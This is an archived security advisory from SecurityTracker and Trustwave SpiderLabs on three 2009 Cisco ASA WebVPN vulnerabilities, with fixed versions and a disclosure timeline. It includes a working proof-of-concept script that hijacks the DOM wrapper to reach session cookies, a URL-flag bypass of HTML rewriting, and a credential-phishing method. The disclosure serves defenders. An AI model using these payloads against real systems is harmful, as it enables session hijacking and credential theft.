SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Firewall)  >   Cisco ASA Vendors:   Cisco
Cisco ASA Bugs Permit Cross-Site Scripting and HTML Injection Attacks
SecurityTracker Alert ID:  1022457
SecurityTracker URL:  http://securitytracker.com/id/1022457
CVE Reference:   CVE-2009-1201, CVE-2009-1202, CVE-2009-1203   (Links to External Site)
Date:  Jun 25 2009
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 8.0(4), 8.1.2, and 8.2.1
Description:   Some vulnerabilities were reported in Cisco ASA. A remote user can conduct cross-site scripting and HTML injection attacks. A remote user may be able to obtain the target user's authentication credentials in certain cases.

A remote user can create specially crafted HTML that rewrites the "CSCO_WebVPN['process']" parameter with a function that will return arbitrary code [CVE-2009-1201]. Then, when the "csco_wrap_js" function is next called, the arbitrary code will be executed by target user's browser. The code will originate from the ASA WebVPN site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Cisco has assigned Cisco Bug ID CSCsy80694 to this vulnerability.

A demonstration exploit is provided:

<html><script>
function a(b, c)
{
return "alert('Your VPN location:\\n\\n'+" +
"document.location+'\\n\\n\\n\\n\\n" +
"Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>

A remote user can create a specially crafted request that, when loaded by the target user, will cause arbitrary HTML to be rendered in the ASA's DOM, permitting cross-site scripting attacks [CVE-2009-1202].

Cisco has assigned Cisco Bug ID CSCsy80705 to this vulnerability.

The device does not sufficiently differentiate the WebVPN login screen from login screens generated when the target user attempts to access a FTP or CIFS server [CVE-2009-1203]. A user may inadvertently send their WebVPN authentication credentials to a FTP or CIFS server.

Cisco has assigned Cisco Bug ID CSCsy80709 to this vulnerability.

The vendor was notified on March 31, 2009.

David Byrne of Trustwave's SpiderLabs reported these vulnerabilities.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the Cisco ASA WebVPN device, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to obtain the target user's authentication credentials in certain cases.

Solution:   The vendor has issued a fix (8.0.4.34, 8.1.2.25).
Vendor URL:  www.cisco.com/ (Links to External Site)
Cause:   Input validation error, State error

Message History:   None.


 Source Message Contents

Subject:  Trustwave's SpiderLabs Security Advisory TWSL2009-002

Trustwave's SpiderLabs Security Advisory TWSL2009-002: 
Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24 Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)

Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description: Cisco's Adaptive Security Appliance (ASA)
provides a number of security related features, including
"Web VPN" functionality that allows authenticated users to
access a variety of content through a web interface. This
includes other web content, FTP servers, and CIFS file
servers.

The web content is proxied by the ASA and rewritten so that
any URLs in the web content are passed as query parameters
sent to the ASA web interface. Where scripting content is
present, the ASA places a JavaScript wrapper around the
original webpage's Document Object Model (DOM), to prevent
the webpage from accessing the ASA's DOM.

Credit: David Byrne of Trustwave's SpiderLabs


Finding 1: Post-Authentication Cross-Site Scripting
CVE: CVE-2009-1201
The ASA's DOM wrapper can be rewritten in a manner to allow
Cross-Site Scripting (XSS) attacks. For example, the
"csco_wrap_js" JavaScript function in /+CSCOL+/cte.js makes
a call to a function referenced by "CSCO_WebVPN['process']".
The result of this call is then used in an "eval" statement.

function csco_wrap_js(str)
{
   var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
           "/+CSCOL+/cte.js></scr"+
           "ipt><script id=CSCO_GHOST src="+
           CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
   var js_mangled=CSCO_WebVPN['process']('js',str);
   ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
   return ret;
};

To exploit this behavior, a malicious page can rewrite
"CSCO_WebVPN['process']" with an attacker-defined function
that will return an arbitrary value. The next time the
"csco_wrap_js" function is called, the malicious code will
be executed. Below is a proof of concept.

<html><script>
function a(b, c)
{
   return "alert('Your VPN location:\\n\\n'+" +
   "document.location+'\\n\\n\\n\\n\\n" +
   "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security This vulnerability is
documented in Cisco Bug ID:  CSCsy80694.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202
When a webpage is requested through the ASA's Web VPN, the
targeted scheme and hostname is Rot13-encoded, then
hex-encoded and placed in the ASA's URL. For example,
"http://www.trustwave.com" is accessed by requesting the
following ASA path:
      
/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+
+/

The HTML content of this request is obviously reformatted by
the ASA, starting at the very beginning:

      <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the
initial hex value of "00" to "01", the HTML document is
returned without any rewriting. This allows the pages
scriptable content to run in the ASA's DOM, making
Cross-Site Scripting trivial.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80705.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203
When a user accesses an FTP or CIFS destination using the
Web VPN, the resulting URL is formatted in a similar manner
as the web requests described above. The following URL
attempts to connect to ftp.example.com; normally, it would
be in an HTML frame within the Web VPN website.

      
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F736763
2e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS
share using anonymous credentials. If those fail, the user
is prompted for login credentials. When viewed on its own
(outside of a frame), the submission form gives no
indication what it is for and is very similar in appearance
to the Web VPN's primary login page. If the URL was sent to
a user by an attacker, it is very possible that a user would
assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's
FTP or CIFS server.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80709.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Vendor Communication Timeline:
03/31/09 - Cisco notified of vulnerabilities
06/24/09 - Cisco software updates released; Advisory
           released

Remediation Steps: Install updated software from Cisco.


Revision History: 1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and
subscription-based information security and payment card
industry compliance management solutions to businesses and
government entities throughout the world. For organizations
faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with
comprehensive solutions that include its flagship
TrustKeeper compliance management software and other
proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500
businesses and large financial institutions to small and
medium-sized retailers--manage compliance and secure their
network infrastructure, data communications and critical
information assets. Trustwave is headquartered in Chicago
with offices throughout North America, South America,
Europe, Africa, China and Australia. For more information,
visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave
responsible for incident response and forensics, ethical
hacking and application security tests for Trustwave's
clients. SpiderLabs has responded to hundreds of security
incidents, performed thousands of ethical hacking exercises
and tested the security of hundreds of business applications
for Fortune 500 organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as
is" without warranty of any kind. Trustwave disclaims all
warranties, either express or implied, including the
warranties of merchantability and fitness for a particular
purpose. In no event shall Trustwave or its suppliers be
liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business
profits or special damages, even if Trustwave or its
suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or
limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC